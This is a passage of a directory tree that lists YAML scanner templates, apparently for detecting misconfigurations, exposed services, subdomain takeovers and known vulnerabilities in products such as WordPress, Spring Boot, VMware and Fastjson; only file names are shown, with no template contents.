exposed-kibana.yaml │ │ ├── exposed-service-now.yaml │ │ ├── exposed-sqlite-manager.yaml │ │ ├── formalms-install.yaml │ │ ├── front-page-misconfig.yaml │ │ ├── git-web-interface.yaml │ │ ├── gitlab │ │ │ ├── gitlab-public-repos.yaml │ │ │ ├── gitlab-public-signup.yaml │ │ │ ├── gitlab-public-snippets.yaml │ │ │ └── gitlab-uninitialized-password.yaml │ │ ├── gitlist-disclosure.yaml │ │ ├── glpi-directory-listing.yaml │ │ ├── gocd │ │ │ ├── gocd-cruise-configuration.yaml │ │ │ ├── gocd-encryption-key.yaml │ │ │ └── gocd-unauth-dashboard.yaml │ │ ├── google │ │ │ └── insecure-firebase-database.yaml │ │ ├── grafana-public-signup.yaml │ │ ├── graphql │ │ │ ├── graphql-alias-batching.yaml │ │ │ ├── graphql-array-batching.yaml │ │ │ ├── graphql-field-suggestion.yaml │ │ │ └── graphql-get-method.yaml │ │ ├── hadoop-unauth.yaml │ │ ├── haproxy-status.yaml │ │ ├── hp │ │ │ └── unauthorized-hp-officepro-printer.yaml │ │ ├── hpe-system-management-anonymous.yaml │ │ ├── ibm-friendly-path-exposure.yaml │ │ ├── iis-internal-ip-disclosure.yaml │ │ ├── jaeger-ui-dashboard.yaml │ │ ├── java-melody-exposed.yaml │ │ ├── jboss-status.yaml │ │ ├── jetty-showcontexts-enable.yaml │ │ ├── jkstatus-manager.yaml │ │ ├── jolokia │ │ │ ├── jolokia-info-disclosure.yaml │ │ │ ├── jolokia-list.yaml │ │ │ ├── jolokia-mbean-search.yaml │ │ │ └── jolokia-unauthenticated-lfi.yaml │ │ ├── jupyter-ipython-unauth.yaml │ │ ├── kafka-cruise-control.yaml │ │ ├── kubeflow-dashboard-unauth.yaml │ │ ├── kubernetes │ │ │ ├── kubernetes-metrics.yaml │ │ │ ├── kubernetes-pods.yaml │ │ │ └── kubernetes-resource-report.yaml │ │ ├── laravel-debug-enabled.yaml │ │ ├── laravel-debug-error.yaml │ │ ├── linkerd-ssrf-detect.yaml │ │ ├── manage-engine-ad-search.yaml │ │ ├── misconfigured-concrete5.yaml │ │ ├── misconfigured-docker.yaml │ │ ├── nextcloud-install.yaml │ │ ├── nginx │ │ │ ├── nginx-status.yaml │ │ │ └── nginx-vhost-traffic-status.yaml │ │ ├── node-exporter-metrics.yaml │ │ ├── office365-open-redirect.yaml │ │ ├── openbmcs │ │ │ ├── openbmcs-secret-disclosure.yaml │ │ │ └── openbmcs-ssrf.yaml │ │ ├── oracle-ebusiness-registration-enabled.yaml │ │ ├── php-errors.yaml │ │ ├── php-fpm-status.yaml │ │ ├── phpmyadmin │ │ │ ├── phpmyadmin-server-import.yaml │ │ │ ├── phpmyadmin-setup.yaml │ │ │ └── phpmyadmin-sql.php-server.yaml │ │ ├── pinpoint-unauth.yaml │ │ ├── private-key-exposure.yaml │ │ ├── prometheus │ │ │ ├── prometheus-config.yaml │ │ │ ├── prometheus-exporter.yaml │ │ │ ├── prometheus-flags.yaml │ │ │ ├── prometheus-log.yaml │ │ │ └── prometheus-targets.yaml │ │ ├── proxy │ │ │ ├── metadata-alibaba.yaml │ │ │ ├── metadata-aws.yaml │ │ │ ├── metadata-azure.yaml │ │ │ ├── metadata-digitalocean.yaml │ │ │ ├── metadata-google.yaml │ │ │ ├── metadata-hetzner.yaml │ │ │ ├── metadata-openstack.yaml │ │ │ ├── metadata-oracle.yaml │ │ │ ├── open-proxy-internal.yaml │ │ │ ├── open-proxy-localhost.yaml │ │ │ └── open-proxy-portscan.yaml │ │ ├── put-method-enabled.yaml │ │ ├── python-metrics.yaml │ │ ├── rack-mini-profiler.yaml │ │ ├── salesforce-aura.yaml │ │ ├── sap │ │ │ ├── sap-directory-listing.yaml │ │ │ └── sap-netweaver-info-leak.yaml │ │ ├── server-status-localhost.yaml │ │ ├── service-pwd.yaml │ │ ├── shell-history.yaml │ │ ├── sitecore-debug-page.yaml │ │ ├── skycaiji-install.yaml │ │ ├── solr-query-dashboard.yaml │ │ ├── sonarqube-public-projects.yaml │ │ ├── spidercontrol-scada-server-info.yaml │ │ ├── springboot │ │ │ ├── springboot-autoconfig.yaml │ │ │ ├── springboot-beans.yaml │ │ │ ├── springboot-configprops.yaml │ │ │ ├── springboot-dump.yaml │ │ │ ├── springboot-env.yaml │ │ │ ├── springboot-gateway.yaml │ │ │ ├── springboot-health.yaml │ │ │ ├── springboot-heapdump.yaml │ │ │ ├── springboot-httptrace.yaml │ │ │ ├── springboot-info.yaml │ │ │ ├── springboot-loggers.yaml │ │ │ ├── springboot-mappings.yaml │ │ │ ├── springboot-metrics.yaml │ │ │ ├── springboot-threaddump.yaml │ │ │ └── springboot-trace.yaml │ │ ├── ssrf-via-oauth-misconfig.yaml │ │ ├── symfony-debugmode.yaml │ │ ├── tcpconfig.yaml │ │ ├── tomcat-scripts.yaml │ │ ├── unauth-wavink-panel.yaml │ │ ├── unauthenticated-alert-manager.yaml │ │ ├── unauthenticated-glances.yaml │ │ ├── unauthenticated-glowroot.yaml │ │ ├── unauthenticated-influxdb.yaml │ │ ├── unauthenticated-lansweeper.yaml │ │ ├── unauthenticated-mongo-express.yaml │ │ ├── unauthenticated-nacos-access.yaml │ │ ├── unauthenticated-netdata.yaml │ │ ├── unauthenticated-nginx-dashboard.yaml │ │ ├── unauthenticated-popup-upload.yaml │ │ ├── unauthenticated-prtg.yaml │ │ ├── unauthenticated-tensorboard.yaml │ │ ├── unauthenticated-varnish-cache-purge.yaml │ │ ├── unauthenticated-zipkin.yaml │ │ ├── unauthorized-h3csecparh-login.yaml │ │ ├── unauthorized-hp-printer.yaml │ │ ├── unauthorized-plastic-scm.yaml │ │ ├── unauthorized-puppet-node-manager-detect.yaml │ │ ├── ups-status.yaml │ │ ├── viewpoint-system-status.yaml │ │ ├── vulnerabilities │ │ │ └── other │ │ │ │ └── umbraco-base-ssrf.yaml │ │ ├── wamp-server-configuration.yaml │ │ ├── wamp-xdebug-detect.yaml │ │ ├── wildcard-postmessage.yaml │ │ ├── xss-deprecated-header.yaml │ │ ├── zabbix-dashboards-access.yaml │ │ ├── zabbix-error.yaml │ │ ├── zenphoto-sensitive-info.yaml │ │ └── zhiyuan-oa-unauthorized.yaml │ ├── network │ │ ├── cisco-smi-exposure.yaml │ │ ├── clickhouse-unauth.yaml │ │ ├── cowrie-honeypot-detect.yaml │ │ ├── detect-addpac-voip-gateway.yaml │ │ ├── detect-jabber-xmpp.yaml │ │ ├── detect-rsyncd.yaml │ │ ├── expn-mail-detect.yaml │ │ ├── exposed-adb.yaml │ │ ├── exposed-redis.yaml │ │ ├── exposed-zookeeper.yaml │ │ ├── ftp-default-credentials.yaml │ │ ├── ftp-weak-credentials.yaml │ │ ├── ganglia-xml-grid-monitor.yaml │ │ ├── iplanet-imap-detect.yaml │ │ ├── java-rmi-detect.yaml │ │ ├── memcached-stats.yaml │ │ ├── mongodb-detect.yaml │ │ ├── mongodb-unauth.yaml │ │ ├── printers-info-leak.yaml │ │ ├── samba-detect.yaml │ │ ├── sap-router-info-leak.yaml │ │ ├── sap-router.yaml │ │ ├── smb-v1-detection.yaml │ │ ├── smtp-detection.yaml │ │ ├── starttls-mail-detect.yaml │ │ ├── tidb-native-password.yaml │ │ ├── tidb-unauth.yaml │ │ ├── totemomail-smtp-detect.yaml │ │ ├── unauth-ftp.yaml │ │ ├── vnc-detect.yaml │ │ ├── vsftpd-detection.yaml │ │ ├── weblogic-iiop-detect.yaml │ │ └── weblogic-t3-detect.yaml │ ├── ssl │ │ └── expired-ssl.yaml │ ├── takeovers │ │ ├── aftership-takeover.yaml │ │ ├── agilecrm-takeover.yaml │ │ ├── aha-takeover.yaml │ │ ├── airee-takeover.yaml │ │ ├── anima-takeover.yaml │ │ ├── announcekit-takeover.yaml │ │ ├── aws-bucket-takeover.yaml │ │ ├── bigcartel-takeover.yaml │ │ ├── bitbucket-takeover.yaml │ │ ├── brightcove-takeover.yaml │ │ ├── campaignmonitor.yaml │ │ ├── canny-takeover.yaml │ │ ├── cargo-takeover.yaml │ │ ├── cargocollective-takeover.yaml │ │ ├── feedpress-takeover.yaml │ │ ├── flexbe-takeover.yaml │ │ ├── flywheel-takeover.yaml │ │ ├── frontify-takeover.yaml │ │ ├── gemfury-takeover.yaml │ │ ├── getresponse-takeover.yaml │ │ ├── ghost-takeover.yaml │ │ ├── gitbook-takeover.yaml │ │ ├── github-takeover.yaml │ │ ├── hatenablog-takeover.yaml │ │ ├── helpjuice-takeover.yaml │ │ ├── helprace-takeover.yaml │ │ ├── helpscout-takeover.yaml │ │ ├── heroku-takeover.yaml │ │ ├── hubspot-takeover.yaml │ │ ├── intercom-takeover.yaml │ │ ├── jazzhr-takeover.yaml │ │ ├── jetbrains-takeover.yaml │ │ ├── kinsta-takeover.yaml │ │ ├── launchrock-takeover.yaml │ │ ├── mashery-takeover.yaml │ │ ├── netlify-takeover.yaml │ │ ├── ngrok-takeover.yaml │ │ ├── pagewiz-takeover.yaml │ │ ├── pantheon-takeover.yaml │ │ ├── pingdom-takeover.yaml │ │ ├── proposify-takeover.yaml │ │ ├── readme-takeover.yaml │ │ ├── readthedocs-takeover.yaml │ │ ├── shopify-takeover.yaml │ │ ├── short-io.yaml │ │ ├── simplebooklet-takeover.yaml │ │ ├── smartjob-takeover.yaml │ │ ├── smugmug-takeover.yaml │ │ ├── sprintful-takeover.yaml │ │ ├── strikingly-takeover.yaml │ │ ├── surge-takeover.yaml │ │ ├── surveygizmo-takeover.yaml │ │ ├── tave-takeover.yaml │ │ ├── teamwork-takeover.yaml │ │ ├── tictail-takeover.yaml │ │ ├── tilda-takeover.yaml │ │ ├── tumblr-takeover.yaml │ │ ├── uberflip-takeover.yaml │ │ ├── uptimerobot-takeover.yaml │ │ ├── vend-takeover.yaml │ │ ├── webflow-takeover.yaml │ │ ├── wishpond-takeover.yaml │ │ ├── wix-takeover.yaml │ │ ├── wordpress-takeover.yaml │ │ ├── worksites-takeover.yaml │ │ ├── wufoo-takeover.yaml │ │ └── zendesk-takeover.yaml │ └── vulnerabilities │ │ ├── apache │ │ ├── apache-flink-unauth-rce.yaml │ │ ├── apache-ofbiz-log4j-rce.yaml │ │ ├── apache-solr-file-read.yaml │ │ └── apache-solr-log4j-rce.yaml │ │ ├── cisco │ │ └── cucm-username-enumeration.yaml │ │ ├── code42 │ │ └── code42-log4j-rce.yaml │ │ ├── confluence │ │ └── confluence-ssrf-sharelinks.yaml │ │ ├── ecology │ │ └── ecology-arbitrary-file-upload.yaml │ │ ├── fastjson │ │ ├── fastjson-1-2-24-rce.yaml │ │ ├── fastjson-1-2-41-rce.yaml │ │ ├── fastjson-1-2-42-rce.yaml │ │ ├── fastjson-1-2-43-rce.yaml │ │ ├── fastjson-1-2-47-rce.yaml │ │ ├── fastjson-1-2-62-rce.yaml │ │ ├── fastjson-1-2-67-rce.yaml │ │ └── fastjson-1-2-68-rce.yaml │ │ ├── generic │ │ ├── basic-xss-prober.yaml │ │ ├── cache-poisoning.yaml │ │ ├── cors-misconfig.yaml │ │ ├── crlf-injection.yaml │ │ ├── error-based-sql-injection.yaml │ │ ├── generic-blind-xxe.yaml │ │ ├── generic-linux-lfi.yaml │ │ ├── generic-windows-lfi.yaml │ │ ├── host-header-injection.yaml │ │ ├── oob-header-based-interaction.yaml │ │ ├── oob-param-based-interaction.yaml │ │ ├── open-redirect.yaml │ │ ├── request-based-interaction.yaml │ │ ├── top-xss-params.yaml │ │ └── xmlrpc-pingback-ssrf.yaml │ │ ├── gitlab │ │ └── gitlab-rce.yaml │ │ ├── httpbin │ │ ├── httpbin-open-redirect.yaml │ │ └── httpbin-xss.yaml │ │ ├── huawei │ │ └── huawei-hg255s-lfi.yaml │ │ ├── ibm │ │ ├── eclipse-help-system-xss.yaml │ │ ├── ibm-infoprint-lfi.yaml │ │ └── ibm-websphere-ssrf.yaml │ │ ├── jamf │ │ ├── jamf-blind-xxe.yaml │ │ └── jamf-log4j-jndi-rce.yaml │ │ ├── jenkins │ │ ├── jenkins-asyncpeople.yaml │ │ ├── jenkins-script.yaml │ │ ├── jenkins-stack-trace.yaml │ │ └── unaunthenticated-jenkin.yaml │ │ ├── jira │ │ ├── jira-service-desk-signup.yaml │ │ ├── jira-unauthenticated-adminprojects.yaml │ │ ├── jira-unauthenticated-dashboards.yaml │ │ ├── jira-unauthenticated-installed-gadgets.yaml │ │ ├── jira-unauthenticated-projectcategories.yaml │ │ ├── jira-unauthenticated-projects.yaml │ │ ├── jira-unauthenticated-resolutions.yaml │ │ ├── jira-unauthenticated-screens.yaml │ │ └── jira-unauthenticated-user-picker.yaml │ │ ├── jolokia │ │ └── jolokia-heap-info-disclosure.yaml │ │ ├── joomla │ │ ├── joomla-jvehicles-lfi.yaml │ │ └── rusty-joomla.yaml │ │ ├── laravel │ │ └── laravel-ignition-xss.yaml │ │ ├── linkerd │ │ └── linkerd-ssrf.yaml │ │ ├── magento │ │ ├── magento-2-exposed-api.yaml │ │ ├── magento-cacheleak.yaml │ │ └── magento-unprotected-dev-files.yaml │ │ ├── metersphere │ │ └── metersphere-plugin-rce.yaml │ │ ├── mobileiron │ │ └── mobileiron-log4j-jndi-rce.yaml │ │ ├── moodle │ │ ├── moodle-filter-jmol-lfi.yaml │ │ ├── moodle-filter-jmol-xss.yaml │ │ └── moodle-xss.yaml │ │ ├── netsweeper │ │ ├── netsweeper-open-redirect.yaml │ │ └── netsweeper-rxss.yaml │ │ ├── oracle │ │ ├── oracle-ebs-bispgraph-file-access.yaml │ │ ├── oracle-ebs-xss.yaml │ │ └── oracle-siebel-xss.yaml │ │ ├── oscommerce │ │ └── oscommerce-rce.yaml │ │ ├── other │ │ ├── 3cx-management-console.yaml │ │ ├── WSO2-2019-0598.yaml │ │ ├── accent-microcomputers-lfi.yaml │ │ ├── acme-xss.yaml │ │ ├── antsword-backdoor.yaml │ │ ├── asanhamayesh-lfi.yaml │ │ ├── aspnuke-openredirect.yaml │ │ ├── avada-xss.yaml │ │ ├── bems-api-lfi.yaml │ │ ├── beward-ipcamera-disclosure.yaml │ │ ├── bitrix-open-redirect.yaml │ │ ├── blue-ocean-excellence-lfi.yaml │ │ ├── buffalo-config-injection.yaml │ │ ├── bullwark-momentum-lfi.yaml │ │ ├── cacti-weathermap-file-write.yaml │ │ ├── caucho-resin-info-disclosure.yaml │ │ ├── chamilo-lms-sqli.yaml │ │ ├── chamilo-lms-xss.yaml │ │ ├── ckan-dom-based-xss.yaml │ │ ├── clockwatch-enterprise-rce.yaml │ │ ├── coldfusion-debug-xss.yaml │ │ ├── commax-biometric-auth-bypass.yaml │ │ ├── commax-credentials-disclosure.yaml │ │ ├── comtrend-password-exposure.yaml │ │ ├── concrete-xss.yaml │ │ ├── core-chuangtian-cloud-rce.yaml │ │ ├── couchdb-adminparty.yaml │ │ ├── cs-cart-unauthenticated-lfi.yaml │ │ ├── dedecms-carbuyaction-fileinclude.yaml │ │ ├── dedecms-membergroup-sqli.yaml │ │ ├── dedecms-openredirect.yaml │ │ ├── dicoogle-pacs-lfi.yaml │ │ ├── discourse-xss.yaml │ │ ├── dixell-xweb500-filewrite.yaml │ │ ├── dlink-850L-info-leak.yaml │ │ ├── dss-download-fileread.yaml │ │ ├── duomicms-sql-injection.yaml │ │ ├── ecology-filedownload-directory-traversal.yaml │ │ ├── ecology-springframework-directory-traversal.yaml │ │ ├── ecology-syncuserinfo-sqli.yaml │ │ ├── ecology-v8-sqli.yaml │ │ ├── ecshop-sqli.yaml │ │ ├── ecsimagingpacs-rce.yaml │ │ ├── eibiz-lfi.yaml │ │ ├── empirecms-xss.yaml │ │ ├── erp-nc-directory-traversal.yaml │ │ ├── etouch-v2-sqli.yaml │ │ ├── ewebs-arbitrary-file-reading.yaml │ │ ├── eyelock-nano-lfd.yaml │ │ ├── eyou-email-rce.yaml │ │ ├── fanruanoa2012-disclosure.yaml │ │ ├── fatpipe-auth-bypass.yaml │ │ ├── fatpipe-backdoor.yaml │ │ ├── feifeicms-lfr.yaml │ │ ├── finereport-path-traversal.yaml │ │ ├── flir-path-traversal.yaml │ │ ├── geovision-geowebserver-lfi.yaml │ │ ├── geovision-geowebserver-xss.yaml │ │ ├── global-domains-lfi.yaml │ │ ├── global-domains-xss.yaml │ │ ├── gloo-unauth.yaml │ │ ├── gnuboard-sms-xss.yaml │ │ ├── goip-1-lfi.yaml │ │ ├── groupoffice-lfi.yaml │ │ ├── gsoap-lfi.yaml │ │ ├── h3c-imc-rce.yaml │ │ ├── hanming-lfr.yaml │ │ ├── hashicorp-consul-rce.yaml │ │ ├── hasura-graphql-psql-exec.yaml │ │ ├── hasura-graphql-ssrf.yaml │ │ ├── hiboss-rce.yaml │ │ ├── hjtcloud-arbitrary-file-read.yaml │ │ ├── hjtcloud-rest-arbitrary-file-read.yaml │ │ ├── homeautomation-v3-openredirect.yaml │ │ ├── hrsale-unauthenticated-lfi.yaml │ │ ├── huawei-hg659-lfi.yaml │ │ ├── huawei-router-auth-bypass.yaml │ │ ├── huijietong-cloud-fileread.yaml │ │ ├── icewarp-webclient-rce.yaml │ │ ├── interlib-fileread.yaml │ │ ├── java-melody-xss.yaml │ │ ├── jeewms-lfi.yaml │ │ ├── jfrog-unauth-build-exposed.yaml │ │ ├── jinfornet-jreport-lfi.yaml │ │ ├── joomla-com-fabrik-lfi.yaml │ │ ├── kafdrop-xss.yaml │ │ ├── karel-ip-phone-lfi.yaml │ │ ├── kevinlab-bems-backdoor.yaml │ │ ├── kevinlab-bems-sqli.yaml │ │ ├── kevinlab-hems-backdoor.yaml │ │ ├── keycloak-xss.yaml │ │ ├── kingdee-eas-directory-traversal.yaml │ │ ├── kingsoft-v8-file-read.yaml │ │ ├── kyocera-m2035dn-lfi.yaml │ │ ├── laravel-filemanager-lfi.yaml │ │ ├── lotuscms-rce.yaml │ │ ├── lucee-xss.yaml │ │ ├── luftguitar-arbitrary-file-upload.yaml │ │ ├── maccmsv10-backdoor.yaml │ │ ├── magicflow-lfi.yaml │ │ ├── mcafee-epo-rce.yaml │ │ ├── metinfo-lfi.yaml │ │ ├── microstrategy-ssrf.yaml │ │ ├── microweber-xss.yaml │ │ ├── mida-eframework-xss.yaml │ │ ├── minimouse-lfi.yaml │ │ ├── mirai-unknown-rce.yaml │ │ ├── mpsec-lfi.yaml │ │ ├── ms-exchange-server-reflected-xss.yaml │ │ ├── myucms-lfr.yaml │ │ ├── natshell-path-traversal.yaml │ │ ├── natshell-rce.yaml │ │ ├── netgear-router-auth-bypass.yaml │ │ ├── netgear-router-exposure.yaml │ │ ├── netgear-wac124-router-auth-bypass.yaml │ │ ├── netis-info-leak.yaml │ │ ├── nginx-merge-slashes-path-traversal.yaml │ │ ├── nginx-module-vts-xss.yaml │ │ ├── ns-asg-file-read.yaml │ │ ├── nuuo-file-inclusion.yaml │ │ ├── nuuo-nvrmini2-rce.yaml │ │ ├── oa-tongda-path-traversal.yaml │ │ ├── oa-v9-uploads-file.yaml │ │ ├── odoo-cms-redirect.yaml │ │ ├── oliver-library-lfi.yaml │ │ ├── opensis-lfi.yaml │ │ ├── opensns-rce.yaml │ │ ├── openvpn-hhi.yaml │ │ ├── optilink-ont1gew-gpon-rce.yaml │ │ ├── oracle-fatwire-lfi.yaml │ │ ├── otobo-open-redirect.yaml │ │ ├── pacsone-server-lfi.yaml │ │ ├── parentlink-xss.yaml │ │ ├── pbootcms-database-file-download.yaml │ │ ├── pdf-signer-ssti-to-rce.yaml │ │ ├── php-timeclock-xss.yaml │ │ ├── php-zerodium-backdoor-rce.yaml │ │ ├── phpwiki-lfi.yaml │ │ ├── pmb-directory-traversal.yaml │ │ ├── pmb-local-file-disclosure.yaml │ │ ├── pollbot-redirect.yaml │ │ ├── powercreator-cms-rce.yaml │ │ ├── processmaker-lfi.yaml │ │ ├── pyspider-unauthorized-access.yaml │ │ ├── qcubed-xss.yaml │ │ ├── qi-anxin-netkang-next-generation-firewall-rce.yaml │ │ ├── qihang-media-disclosure.yaml │ │ ├── qihang-media-lfi.yaml │ │ ├── qizhi-fortressaircraft-unauth.yaml │ │ ├── rconfig-rce.yaml │ │ ├── resin-cnnvd-200705-315.yaml │ │ ├── resin-inputfile-fileread.yaml │ │ ├── resin-viewfile-lfr.yaml │ │ ├── rockmongo-xss.yaml │ │ ├── sangfor-edr-auth-bypass.yaml │ │ ├── sangfor-edr-rce.yaml │ │ ├── sap-redirect.yaml │ │ ├── sar2html-rce.yaml │ │ ├── seacms-rce.yaml │ │ ├── seacms-sqli.yaml │ │ ├── seowon-router-rce.yaml │ │ ├── servicenow-helpdesk-credential.yaml │ │ ├── showdoc-file-upload-rce.yaml │ │ ├── sick-beard-xss.yaml │ │ ├── sl-studio-lfi.yaml │ │ ├── sofneta-mecdream-pacs-lfi.yaml │ │ ├── solar-log-authbypass.yaml │ │ ├── sonicwall-sslvpn-shellshock.yaml │ │ ├── spark-webui-unauth.yaml │ │ ├── sponip-network-system-ping-rce.yaml │ │ ├── symantec-messaging-gateway.yaml │ │ ├── tamronos-rce.yaml │ │ ├── tekon-info-leak.yaml │ │ ├── thinkific-redirect.yaml │ │ ├── thruk-xss.yaml │ │ ├── tianqing-info-leak.yaml │ │ ├── tikiwiki-json-rpc.yaml │ │ ├── tikiwiki-reflected-xss.yaml │ │ ├── tongda-session-disclosure.yaml │ │ ├── tpshop-directory-traversal.yaml │ │ ├── turbocrm-xss.yaml │ │ ├── twig-php-ssti.yaml │ │ ├── ueditor-file-upload.yaml │ │ ├── unauth-hoteldruid-panel.yaml │ │ ├── unauth-rlm.yaml │ │ ├── unauth-spark-api.yaml │ │ ├── unifi-network-log4j-rce.yaml │ │ ├── vanguard-post-xss.yaml │ │ ├── viewlinc-crlf-injection.yaml │ │ ├── vpms-auth-bypass.yaml │ │ ├── watchguard-credentials-disclosure.yaml │ │ ├── webui-rce.yaml │ │ ├── wems-manager-xss.yaml │ │ ├── wooyun-2015-148227.yaml │ │ ├── wooyun-path-traversal.yaml │ │ ├── wuzhicms-sqli.yaml │ │ ├── xdcms-sqli.yaml │ │ ├── xerox-efi-lfi.yaml │ │ ├── yapi-rce.yaml │ │ ├── yarn-resourcemanager-rce.yaml │ │ ├── yishaadmin-lfi.yaml │ │ ├── yonyou-u8-oa-sqli.yaml │ │ ├── zcms-v3-sqli.yaml │ │ ├── zhiyuan-file-upload.yaml │ │ ├── zhiyuan-oa-info-leak.yaml │ │ ├── zhiyuan-oa-session-leak.yaml │ │ ├── zimbra-preauth-ssrf.yaml │ │ └── zms-auth-bypass.yaml │ │ ├── rails │ │ └── rails6-xss.yaml │ │ ├── ransomware │ │ └── deadbolt-ransomware.yaml │ │ ├── rocketchat │ │ └── unauth-message-read.yaml │ │ ├── ruijie │ │ ├── ruijie-eg-rce.yaml │ │ ├── ruijie-networks-lfi.yaml │ │ ├── ruijie-networks-rce.yaml │ │ └── ruijie-password-leak.yaml │ │ ├── samsung │ │ ├── samsung-wlan-ap-lfi.yaml │ │ ├── samsung-wlan-ap-rce.yaml │ │ └── samsung-wlan-ap-xss.yaml │ │ ├── simplecrm │ │ └── simple-crm-sql-injection.yaml │ │ ├── springboot │ │ ├── springboot-actuators-jolokia-xxe.yaml │ │ ├── springboot-h2-db-rce.yaml │ │ └── springboot-log4j-rce.yaml │ │ ├── squirrelmail │ │ ├── squirrelmail-add-xss.yaml │ │ ├── squirrelmail-lfi.yaml │ │ └── squirrelmail-vkeyboard-xss.yaml │ │ ├── thinkcmf │ │ ├── thinkcmf-arbitrary-code-execution.yaml │ │ ├── thinkcmf-lfi.yaml │ │ └── thinkcmf-rce.yaml │ │ ├── thinkphp │ │ ├── thinkphp-2-rce.yaml │ │ ├── thinkphp-501-rce.yaml │ │ ├── thinkphp-5022-rce.yaml │ │ ├── thinkphp-5023-rce.yaml │ │ └── thinkphp-509-information-disclosure.yaml │ │ ├── vmware │ │ ├── vmware-horizon-log4j-jndi-rce.yaml │ │ ├── vmware-vcenter-lfi-linux.yaml │ │ ├── vmware-vcenter-lfi.yaml │ │ ├── vmware-vcenter-log4j-jndi-rce.yaml │ │ ├── vmware-vcenter-ssrf.yaml │ │ └── vrealize-operations-log4j-rce.yaml │ │ └── wordpress │ │ ├── accessibility-helper-xss.yaml │ │ ├── ad-widget-lfi.yaml │ │ ├── admin-word-count-column-lfi.yaml │ │ ├── advanced-access-manager-lfi.yaml │ │ ├── age-gate-open-redirect.yaml │ │ ├── alfacgiapi-wordpress.yaml │ │ ├── amministrazione-aperta-lfi.yaml │ │ ├── aspose-file-download.yaml │ │ ├── aspose-ie-file-download.yaml │ │ ├── aspose-pdf-file-download.yaml │ │ ├── aspose-words-file-download.yaml │ │ ├── attitude-theme-open-redirect.yaml │ │ ├── brandfolder-lfi.yaml │ │ ├── brandfolder-open-redirect.yaml │ │ ├── cab-fare-calculator-lfi.yaml │ │ ├── candidate-application-lfi.yaml │ │ ├── cherry-file-download.yaml │ │ ├── cherry-lfi.yaml │ │ ├── church-admin-lfi.yaml │ │ ├── churchope-lfi.yaml │ │ ├── db-backup-lfi.yaml │ │ ├── diarise-theme-lfi.yaml │ │ ├── dzs-zoomsounds-listing.yaml │ │ ├── easy-media-gallery-pro-listing.yaml │ │ ├── eatery-restaurant-open-redirect.yaml │ │ ├── elex-woocommerce-xss.yaml │ │ ├── feedwordpress-xss.yaml │ │ ├── flow-flow-social-stream-xss.yaml │ │ ├── hb-audio-lfi.yaml │ │ ├── health-check-lfi.yaml │ │ ├── hide-security-enhancer-lfi.yaml │ │ ├── issuu-panel-lfi.yaml │ │ ├── mthemeunus-lfi.yaml │ │ ├── music-store-open-redirect.yaml │ │ ├── my-chatbot-xss.yaml │ │ ├── nativechurch-wp-theme-lfd.yaml │ │ ├── newsletter-manager-open-redirect.yaml │ │ ├── newsletter-open-redirect.yaml │ │ ├── ninjaform-open-redirect.yaml │ │ ├── pieregister-open-redirect.yaml │ │ ├── sassy-social-share.yaml │ │ ├── seo-redirection-xss.yaml │ │ ├── shortcode-lfi.yaml │ │ ├── simple-image-manipulator-lfi.yaml │ │ ├── sniplets-lfi.yaml │ │ ├── sniplets-xss.yaml │ │ ├── ultimatemember-open-redirect.yaml │ │ ├── video-synchro-pdf-lfi.yaml │ │ ├── w3c-total-cache-ssrf.yaml │ │ ├── weekender-newspaper-open-redirect.yaml │ │ ├── wordpress-accessible-wpconfig.yaml │ │ ├── wordpress-affiliatewp-log.yaml │ │ ├── wordpress-bbpress-plugin-listing.yaml │ │ ├── wordpress-db-backup-listing.yaml │ │ ├── wordpress-db-backup.yaml │ │ ├── wordpress-db-repair.yaml │ │ ├── wordpress-debug-log.yaml │ │ ├── wordpress-directory-listing.yaml │ │ ├── wordpress-elementor-plugin-listing.yaml │ │ ├── wordpress-emergency-script.yaml │ │ ├── wordpress-git-config.yaml │ │ ├── wordpress-gtranslate-plugin-listing.yaml │ │ ├── wordpress-infinitewp-auth-bypass.yaml │ │ ├── wordpress-installer-log.yaml │ │ ├── wordpress-rce-simplefilelist.yaml │ │ ├── wordpress-rdf-user-enum.yaml │ │ ├── wordpress-redirection-plugin-listing.yaml │ │ ├── wordpress-social-metrics-tracker.yaml │ │ ├── wordpress-ssrf-oembed.yaml │ │ ├── wordpress-tmm-db-migrate.yaml │ │ ├── wordpress-total-upkeep-backup-download.yaml │ │ ├── wordpress-updraftplus-pem-key.yaml │ │ ├── wordpress-user-enum.yaml │ │ ├── wordpress-woocommerce-listing.yaml │ │ ├── wordpress-woocommerce-sqli.yaml │ │ ├── wordpress-wordfence-lfi.yaml │ │ ├── wordpress-wordfence-waf-bypass-xss.yaml │ │ ├── wordpress-wordfence-xss.yaml │ │ ├── wordpress-wp-cron.yaml │ │ ├── wordpress-xmlrpc-listmethods.yaml │ │ ├── wordpress-zebra-form-xss.yaml │ │ ├── wp-123contactform-plugin-listing.yaml │ │ ├── wp-adaptive-xss.yaml │ │ ├── wp-altair-listing.yaml │ │ ├── wp-ambience-xss.yaml │ │ ├── wp-arforms-listing.yaml │ │ ├── wp-church-admin-xss.yaml │ │ ├── wp-code-snippets-xss.yaml │ │ ├── wp-config-setup.yaml │ │ ├── wp-custom-tables-xss.yaml │ │ ├── wp-email-subscribers-listing.yaml │ │ ├── wp-enabled-registration.yaml │ │ ├── wp-finder-xss.yaml │ │ ├── wp-flagem-xss.yaml │ │ ├── wp-full-path-disclosure.yaml │ │ ├── wp-grimag-open-redirect.yaml │ │ ├── wp-gtranslate-open-redirect.yaml │ │ ├── wp-haberadam-idor.yaml │ │ ├── wp-idx-broker-platinum-listing.yaml │ │ ├── wp-install.yaml │ │ ├── wp-iwp-client-listing.yaml │ │ ├── wp-javospot-lfi.yaml │ │ ├── wp-knews-xss.yaml │ │ ├── wp-license-file.yaml │ │ ├── wp-mailchimp-log-exposure.yaml │ │ ├── wp-memphis-documents-library-lfi.yaml │ │ ├── wp-mstore-plugin-listing.yaml │ │ ├── wp-multiple-theme-ssrf.yaml │ │ ├── wp-nextgen-xss.yaml │ │ ├── wp-oxygen-theme-lfi.yaml │ │ ├── wp-phpfreechat-xss.yaml │ │ ├── wp-plugin-1-flashgallery-listing.yaml │ │ ├── wp-plugin-lifterlms.yaml │ │ ├── wp-plugin-utlimate-member.yaml │ │ ├── wp-popup-listing.yaml │ │ ├── wp-prostore-open-redirect.yaml │ │ ├── wp-qards-listing.yaml │ │ ├── wp-revslider-file-download.yaml │ │ ├── wp-securimage-xss.yaml │ │ ├── wp-security-open-redirect.yaml │ │ ├── wp-sfwd-lms-listing.yaml │ │ ├── wp-simple-fields-lfi.yaml │ │ ├── wp-slideshow-xss.yaml │ │ ├── wp-socialfit-xss.yaml │ │ ├── wp-spot-premium-lfi.yaml │ │ ├── wp-super-forms.yaml │ │ ├── 